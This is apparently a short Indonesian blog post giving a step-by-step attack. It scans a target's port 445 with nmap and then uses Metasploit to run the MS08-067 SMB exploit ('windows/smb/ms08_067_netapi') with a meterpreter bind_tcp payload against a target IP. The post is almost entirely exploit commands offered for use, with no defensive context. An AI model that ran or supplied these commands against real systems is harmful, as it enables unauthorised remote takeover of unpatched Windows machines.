Serangan :
1. Cek port target pada port 445.
nmap ip-target]

2. Jalankan Metasploit.
msfconsole

3. Jalankan Perintah untuk Melakukan Serangan.

nmap ip-target
use windows/smb/ms08_067_netapi (enter)
set payload windows/meterpreter/bind_tcp (enter)
set lhost ip-kita
set rhost ip-target
exploit

Tidak ada komentar:
Posting Komentar